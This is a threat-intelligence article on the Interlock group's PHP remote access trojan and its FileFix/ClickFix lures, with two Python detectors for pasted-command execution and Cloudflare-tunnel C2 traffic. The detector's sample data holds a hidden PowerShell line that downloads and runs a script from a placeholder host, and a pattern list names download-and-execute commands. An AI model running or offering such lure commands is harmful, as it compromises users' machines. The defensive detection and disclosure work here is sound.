Interlock RAT

Cybercriminals behind the Interlock ransomware operation are escalating their efforts with a newly developed PHP variant of their custom remote access trojan (RAT), Interlock RAT, also known as NodeSnake. This upgraded threat has been observed in a widespread campaign using an evolved delivery mechanism dubbed FileFix, an offshoot of the previously known ClickFix technique. The development marks a significant shift in the group's attack strategy, expanding their reach and demonstrating increasing technical sophistication.

Stealthy Entry: Script Injection and Traffic Redirection

The campaign, active since May 2025, begins with compromised websites into which a seemingly benign single-line JavaScript snippet has been injected into the HTML. This script functions as a traffic distribution system (TDS), applying IP-based filtering so that only targeted visitors are redirected to fake CAPTCHA verification pages. These fraudulent pages use ClickFix-style lures to trick users into pasting and running an attacker-supplied PowerShell command. The result is the installation of Interlock RAT, granting attackers a foothold on the victim's system.

FileFix: A Weaponized Delivery Innovation

The latest campaigns observed in June 2025 showcase the use of FileFix, a variation on ClickFix, as the core infection vector. Where ClickFix typically has the victim paste a command into the Windows Run dialog, FileFix has them paste it into the File Explorer address bar, which also executes commands, so the lure can be dressed up as a file path. Originally demonstrated as a proof-of-concept in June 2025, FileFix has now been operationalized to distribute the PHP variant of Interlock RAT; in some cases this deployment acts as a precursor to the installation of the established Node.js-based variant.
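Both the ClickFix lure described above and the FileFix variant end the same way on the endpoint: a command the user pasted is executed by explorer.exe (the Run dialog and the Explorer address bar are both hosted by it), so the parent process of the resulting shell is the most reliable tell. The following detector is an added example, not code from the original article or from any vendor's tooling; it runs over constructed Sysmon-style process-creation events (the paths, host names and command lines are invented), and the assumption that the PHP RAT's interpreter runs from a user-writable profile directory is labelled in the code.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://example.invalid/x.ps1 | iex"'},
    {"Image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"php.exe C:\Users\alice\AppData\Roaming\php\cfg.php"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Interpreters a pasted command typically lands in.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Download-and-run markers commonly seen in pasted lures.
SUSPICIOUS_CMD = re.compile(
    r"\b(iwr|iex|invoke-webrequest|invoke-expression|curl|wget)\b|-enc|https?://", re.I)

# Directories a standard user can write to (assumption about the drop location).
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|users\\public)\\", re.I)


def basename(path):
    return PureWindowsPath(path).name.lower()


def classify(ev):
    """Return a list of reasons this event is suspicious (empty if none)."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    reasons = []
    # Both ClickFix (Win+R) and FileFix (Explorer address bar) run the pasted
    # command under explorer.exe, so the shell's parent is the tell.
    if parent == "explorer.exe" and image in SHELLS and SUSPICIOUS_CMD.search(cmd):
        reasons.append("shell spawned by explorer.exe with download/exec command (ClickFix/FileFix)")
    # A PHP interpreter executing from a profile directory is not normal desktop activity.
    if image == "php.exe" and USER_WRITABLE.search(ev["Image"]):
        reasons.append("php.exe running from a user-writable directory")
    return reasons


def scan(events):
    """Return (index, reason) pairs for every suspicious event."""
    return [(i, r) for i, ev in enumerate(events) for r in classify(ev)]


if __name__ == "__main__":
    for i, reason in scan(SAMPLE_EVENTS):
        print(f"event {i}: {reason}")
```

Against the constructed events, the first (explorer.exe spawning a hidden PowerShell that downloads and evaluates a script) and the second (php.exe under AppData) are flagged; the developer's build script and the notepad launch are not. The explorer.exe parent check is what separates a pasted lure from the far more common case of a shell started by a terminal, an IDE or a scheduled task.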

Multi-Stage Payloads and Stealth Capabilities

Once deployed, Interlock RAT collects host reconnaissance data and exfiltrates it in JSON format. It checks its privilege level (USER, ADMIN, or SYSTEM) and establishes contact with a remote command-and-control (C2) server, from which additional payloads, either EXE or DLL files, are fetched for execution.

Persistence and lateral-movement mechanisms include:

  • Modifying the Windows Registry to maintain startup execution.
  • Enabling lateral movement through Remote Desktop Protocol (RDP) access.

A notable evasion technique is the use of Cloudflare Tunnel subdomains as the C2 address, which masks the server's actual location behind Cloudflare's infrastructure. Hard-coded IP addresses serve as backups to maintain connectivity if the tunnels are disrupted.
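The tunnel-plus-fallback design described above leaves a distinctive network footprint: a connection to a tunnel hostname, then, if the tunnel goes away, a direct connection to a bare IP from the same host and process. The scanner below is an added example, not code from the original article; it runs over constructed proxy log lines (host names, process names and addresses are invented, and the 203.0.113.x / 198.51.100.x documentation ranges stand in for public IPs). It assumes the tunnels are Cloudflare quick tunnels, whose hostnames are random labels under trycloudflare.com; adjust the suffix if your observed tunnels use a customer-owned domain.

```python
import ipaddress
import re

# Constructed proxy log (not real telemetry):
# "<timestamp> <source_host> <process> <destination>:<port>"
SAMPLE_PROXY_LOG = """\
2025-06-10T10:01:02Z WS-0417 php.exe red-fox-example.trycloudflare.com:443
2025-06-10T10:01:05Z WS-0417 chrome.exe www.example.com:443
2025-06-10T10:02:10Z WS-0417 php.exe 203.0.113.25:443
2025-06-10T10:03:00Z WS-0982 outlook.exe outlook.office365.com:443
2025-06-10T10:04:30Z WS-0982 chrome.exe 198.51.100.7:8080
"""

# Assumption: the tunnels are Cloudflare quick tunnels, whose hostnames
# are random labels under trycloudflare.com.
TUNNEL_SUFFIX = ".trycloudflare.com"

# Destinations inside these ranges are treated as internal and ignored.
# (Checked explicitly rather than via is_private, which would also exclude
# the documentation ranges used as stand-in public IPs in the sample log.)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+):(\d+)$")


def parse_proxy_log(text):
    """Yield one record per well-formed line; skip anything else."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, host, proc, dest, port = m.groups()
            yield {"ts": ts, "host": host, "proc": proc,
                   "dest": dest.lower(), "port": int(port)}


def external_ip(dest):
    """Return the address if dest is a literal IP outside INTERNAL_NETS, else None."""
    try:
        addr = ipaddress.ip_address(dest)
    except ValueError:
        return None
    return None if any(addr in net for net in INTERNAL_NETS) else addr


def find_c2_candidates(text):
    """Flag tunnel hostnames, and direct-to-IP connections that look like fallback C2."""
    findings = []
    tunnel_hosts = set()  # source hosts already seen talking to a tunnel
    for rec in parse_proxy_log(text):
        if rec["dest"].endswith(TUNNEL_SUFFIX):
            tunnel_hosts.add(rec["host"])
            findings.append((rec["host"], rec["proc"], rec["dest"],
                             "Cloudflare quick-tunnel hostname"))
        elif external_ip(rec["dest"]) and (rec["proc"].lower() == "php.exe"
                                           or rec["host"] in tunnel_hosts):
            findings.append((rec["host"], rec["proc"], rec["dest"],
                             "direct-to-IP connection (possible hard-coded fallback C2)"))
    return findings


if __name__ == "__main__":
    for host, proc, dest, why in find_c2_candidates(SAMPLE_PROXY_LOG):
        print(f"{host} {proc} -> {dest}: {why}")
```

On the sample log, WS-0417 is flagged twice: once for the tunnel hostname and once for the bare-IP connection that follows it. The direct-to-IP connection from WS-0982's browser is not flagged, because that host never contacted a tunnel and the process is not the PHP interpreter; bare-IP traffic on its own is too common to alert on, which is why the scanner keys the fallback check to prior tunnel contact.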

Tracking the Threat: Past Targets and Present Motives

Earlier in 2025, Interlock RAT was involved in attacks on local government and educational institutions in the UK, using the Node.js variant. The recent shift to a PHP variant, delivered through opportunistic web-injection campaigns rather than sector-focused intrusions, suggests targeting across a wider range of industries. Whether the choice of PHP also reflects an intent to exploit vulnerable web infrastructure is not established by the observed campaigns; what is established is that it gives the group a second interpreter-based implant to deliver through the same lures.

Key Indicators of the Campaign

Defenders should be alert to the following hallmarks of Interlock's latest operations:

Initial Attack Vector:

  • Single-line JavaScript injections on legitimate but compromised websites.
  • Redirection to fake CAPTCHA pages using IP filtering.

Malware Behavior Post-Infection:

  • Host reconnaissance and JSON-formatted system info exfiltration.
  • Privilege checks and remote payload execution.
  • Registry-based persistence and use of RDP for lateral movement.

Conclusion: Interlock Group’s Growing Threat Profile

The emergence of the PHP variant of Interlock RAT demonstrates the group's growing versatility and intent to stay ahead of defensive countermeasures. By leveraging both web scripting and native system features, Interlock attackers are blurring the lines between traditional malware delivery and creative abuse of everyday system functionalities. Security teams should remain vigilant and implement layered defenses to detect and block such evolving threats.
